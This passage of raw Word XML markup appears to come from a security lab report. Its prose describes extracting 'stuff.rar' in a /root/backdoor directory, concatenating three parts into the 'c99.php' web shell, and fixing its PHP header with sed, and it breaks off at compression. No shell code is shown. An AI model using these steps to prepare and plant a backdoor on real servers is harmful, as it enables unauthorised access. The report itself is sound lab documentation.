        <w:t xml:space="preserve">, we got the </w:t>
      </w:r>
      <w:r w:rsidR="00DA008D" w:rsidRPr="00DA008D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stuff.rar</w:t>
      </w:r>
      <w:r w:rsidR="00DA008D">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
      <w:r w:rsidR="006B4B73">
        <w:t xml:space="preserve"> Using the command </w:t>
      </w:r>
      <w:r w:rsidR="006B4B73" w:rsidRPr="006B4B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ls -lrta</w:t>
      </w:r>
      <w:r w:rsidR="006B4B73" w:rsidRPr="006B4B73">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006B4B73">
        <w:t>we liste</w:t>
      </w:r>
      <w:r w:rsidR="0085752B">
        <w:t>d the content</w:t>
      </w:r>
      <w:r w:rsidR="00BA2B4A">
        <w:t xml:space="preserve">s of </w:t>
      </w:r>
      <w:r w:rsidR="00BA2B4A" w:rsidRPr="00146A6F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/root/backdoor</w:t>
      </w:r>
      <w:r w:rsidR="00BA2B4A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2B4A">
        <w:t>directory</w:t>
      </w:r>
      <w:r w:rsidR="00375B01">
        <w:t xml:space="preserve"> in a long listing format </w:t>
      </w:r>
      <w:r w:rsidR="00DD5D2E">
        <w:t xml:space="preserve">including the hidden files </w:t>
      </w:r>
      <w:r w:rsidR="00375B01">
        <w:t xml:space="preserve">sorted by modification </w:t>
      </w:r>
      <w:r w:rsidR="00DD5D2E">
        <w:t xml:space="preserve">time in the reverse order. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2CE1D" w14:textId="52099EEB" w:rsidR="00C10ADF" w:rsidRDefault="008A536F" w:rsidP="00C10ADF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251736064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56228CCA" wp14:editId="1DC070B5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-9524</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2671445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2419350" cy="161925"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="26" name="Flowchart: Alternate Process 26"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2419350" cy="161925"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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09DF7" id="Flowchart: Alternate Process 26" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:-.75pt;margin-top:210.35pt;width:190.5pt;height:12.7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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00503757">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0500A3" wp14:editId="22124AA5">
            <wp:extent cx="5938520" cy="3627294"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="454" name="Picture 45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1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="646" t="12781" r="52012" b="35811"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989760" cy="3658592"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05BF8B" w14:textId="59C4D1D9" w:rsidR="0031671C" w:rsidRDefault="00C10ADF" w:rsidP="0031671C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00312AFB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ownloading </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stuff.rar</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10ADF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and viewing the contents of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B117D58" w14:textId="77777777" w:rsidR="0031671C" w:rsidRPr="0031671C" w:rsidRDefault="0031671C" w:rsidP="0031671C"/>
    <w:p w14:paraId="51709E91" w14:textId="4BC40BCE" w:rsidR="0028153C" w:rsidRDefault="005F2DED" w:rsidP="0028153C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc41839628"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Extracting </w:t>
      </w:r>
      <w:r w:rsidR="00C10ADF">
        <w:t>stuff.rar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="00C10ADF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C646BE5" w14:textId="19D8A3F2" w:rsidR="0092189D" w:rsidRDefault="00CD69FC" w:rsidP="0092189D">
      <w:r>
        <w:t xml:space="preserve">We used the command </w:t>
      </w:r>
      <w:r w:rsidR="009C28F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unrar x stuff.rar</w:t>
      </w:r>
      <w:r w:rsidR="009C28F6">
        <w:t xml:space="preserve"> to extract </w:t>
      </w:r>
      <w:r w:rsidR="00207E67">
        <w:t xml:space="preserve">the content of </w:t>
      </w:r>
      <w:r w:rsidR="009C28F6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stuff.rar</w:t>
      </w:r>
      <w:r w:rsidR="006C7073">
        <w:t xml:space="preserve">, then we concatenated </w:t>
      </w:r>
      <w:r w:rsidR="006C7073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>part1.txt</w:t>
      </w:r>
      <w:r w:rsidR="006C7073">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006C7073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>part2.txt</w:t>
      </w:r>
      <w:r w:rsidR="006C7073">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="006C7073">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>part3.txt</w:t>
      </w:r>
      <w:r w:rsidR="006C7073">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="0092189D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php</w:t>
      </w:r>
      <w:r w:rsidR="0092189D">
        <w:t xml:space="preserve"> by using the </w:t>
      </w:r>
      <w:r w:rsidR="0092189D" w:rsidRPr="0092189D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cat part1.txt part2.txt part3.txt &gt; c99.php</w:t>
      </w:r>
      <w:r w:rsidR="0092189D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0092189D">
        <w:t xml:space="preserve">command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698D642" w14:textId="5E56EE63" w:rsidR="00E62E60" w:rsidRPr="00A86BCA" w:rsidRDefault="0092189D" w:rsidP="00E62E60">
      <w:r>
        <w:t xml:space="preserve">Further, we </w:t>
      </w:r>
      <w:r w:rsidR="005454DD">
        <w:t xml:space="preserve">created a backup of </w:t>
      </w:r>
      <w:r w:rsidR="005454DD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php</w:t>
      </w:r>
      <w:r w:rsidR="00A86BCA">
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r w:rsidR="00A86BCA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php.bkp</w:t>
      </w:r>
      <w:r w:rsidR="00A86BCA">
        <w:t xml:space="preserve"> by using the command </w:t>
      </w:r>
      <w:r w:rsidR="00A86BCA" w:rsidRPr="00A86BCA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cp c99.php c99.php.bkp</w:t>
      </w:r>
      <w:r w:rsidR="00DD0746" w:rsidRPr="00DD0746">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A0FA34" w14:textId="708D74AD" w:rsidR="00DD0746" w:rsidRDefault="008A536F" w:rsidP="00DD0746">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="755C4E86" wp14:editId="6085EA08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-9525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1794510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5438775" cy="334010"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="481" name="Flowchart: Alternate Process 481"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5438775" cy="334010"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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54D47" id="Flowchart: Alternate Process 481" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:-.75pt;margin-top:141.3pt;width:428.25pt;height:26.3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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6195D55F" wp14:editId="64969F53">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3228975" cy="152400"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="473" name="Flowchart: Alternate Process 473"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3228975" cy="152400"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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7A4DA" id="Flowchart: Alternate Process 473" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:0;margin-top:.3pt;width:254.25pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00816961">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328B8AA5" wp14:editId="17D61B78">
            <wp:extent cx="5924550" cy="2125023"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="457" name="Picture 45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2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="676" t="64048" r="53989" b="7043"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5989372" cy="2148273"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BABA1D0" w14:textId="4C028217" w:rsidR="00DD0746" w:rsidRDefault="00DD0746" w:rsidP="00DD0746">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Extracting </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stuff.rar</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, concatenating </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>part1.tx</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>part2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>part3.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and creating a backup of </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0746">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c99.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67426069" w14:textId="3374B9B3" w:rsidR="00D847B7" w:rsidRDefault="00D847B7" w:rsidP="00D847B7"/>
    <w:p w14:paraId="2004D222" w14:textId="73FE2E7A" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="7949ED23" w14:textId="241B4A6F" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="46033B65" w14:textId="050A7EF1" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="7EB49094" w14:textId="701B8456" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="6AB0B9C5" w14:textId="18D3B560" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="0CE1F28E" w14:textId="5322DA6C" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="7B223AD8" w14:textId="6B3879F6" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="70ABB831" w14:textId="06C62A50" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="7B51F1EF" w14:textId="11BB6AD8" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="5DFE8E40" w14:textId="09A4066B" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="7496F030" w14:textId="5D895FEA" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="7A318539" w14:textId="58D0C727" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="5C750F4A" w14:textId="11D867D9" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="36149AC4" w14:textId="4F822E1D" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="3554995A" w14:textId="77777777" w:rsidR="00821CAD" w:rsidRDefault="00821CAD" w:rsidP="00D847B7"/>
    <w:p w14:paraId="3C7A1B43" w14:textId="0B66173D" w:rsidR="00821CAD" w:rsidRDefault="0031671C" w:rsidP="00821CAD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc41839629"/>
      <w:r>
        <w:t>Configuring c99.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="66964032" w14:textId="58F50089" w:rsidR="00821CAD" w:rsidRDefault="0041326D" w:rsidP="00821CAD">
      <w:r>
        <w:t xml:space="preserve">Using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ls -lrta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> c99*</w:t>
      </w:r>
      <w:r w:rsidRPr="006B4B73">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we listed the </w:t>
      </w:r>
      <w:r w:rsidR="009E574D">
        <w:t xml:space="preserve">files </w:t>
      </w:r>
      <w:r w:rsidR="00C5374D">
        <w:t xml:space="preserve">named </w:t>
      </w:r>
      <w:r w:rsidR="00C5374D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C5374D">
        <w:t>in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00146A6F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/root/backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directory in a long listing format including the hidden files sorted by modification time in the reverse order.</w:t>
      </w:r>
      <w:r w:rsidR="00A904FE">
        <w:t xml:space="preserve"> We then checked the</w:t>
      </w:r>
      <w:r w:rsidR="00AF5BE7">
        <w:t xml:space="preserve"> first line of </w:t>
      </w:r>
      <w:r w:rsidR="00AF5BE7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">c99.php </w:t>
      </w:r>
      <w:r w:rsidR="00AF5BE7">
        <w:t>and noticed that it does</w:t>
      </w:r>
      <w:r w:rsidR="004E5DD6">
        <w:t xml:space="preserve"> not contain “&lt;?php” using the </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Hlk41182268"/>
      <w:r w:rsidR="00624B83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>head -1 c99.php</w:t>
      </w:r>
      <w:r w:rsidR="00624B83">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="00624B83">
        <w:t xml:space="preserve">. Further we replaced the first line </w:t>
      </w:r>
      <w:r w:rsidR="005B2575">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="005B2575">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php</w:t>
      </w:r>
      <w:r w:rsidR="005B2575">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF5178">
        <w:t>with “&lt;?php”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF5178">
        <w:t xml:space="preserve">using the </w:t>
      </w:r>
      <w:r w:rsidR="00AF5178" w:rsidRPr="00AF5178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sed -i '1 s/^.*$/&lt;?php/g' c99.php</w:t>
      </w:r>
      <w:r w:rsidR="00527753">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00527753">
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r w:rsidR="00AD306F">
        <w:t xml:space="preserve">and checked </w:t>
      </w:r>
      <w:r w:rsidR="0056491B">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidR="00AD306F">
        <w:t xml:space="preserve">the first line </w:t>
      </w:r>
      <w:r w:rsidR="0056491B">
        <w:t>contains “&lt;?php”</w:t>
      </w:r>
      <w:r w:rsidR="00AD306F">
        <w:t xml:space="preserve"> by using the </w:t>
      </w:r>
      <w:r w:rsidR="00AD306F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>head -1 c99.php</w:t>
      </w:r>
      <w:r w:rsidR="00AD306F">
        <w:t xml:space="preserve"> command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D28F434" w14:textId="7BA2B3D1" w:rsidR="001E0A68" w:rsidRPr="00784336" w:rsidRDefault="001E0A68" w:rsidP="00821CAD">
      <w:r>
        <w:t xml:space="preserve">We then compressed </w:t>
      </w:r>
      <w:r w:rsidRPr="00533E41">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c99.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00784336">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">c99.php.gz </w:t>
      </w:r>
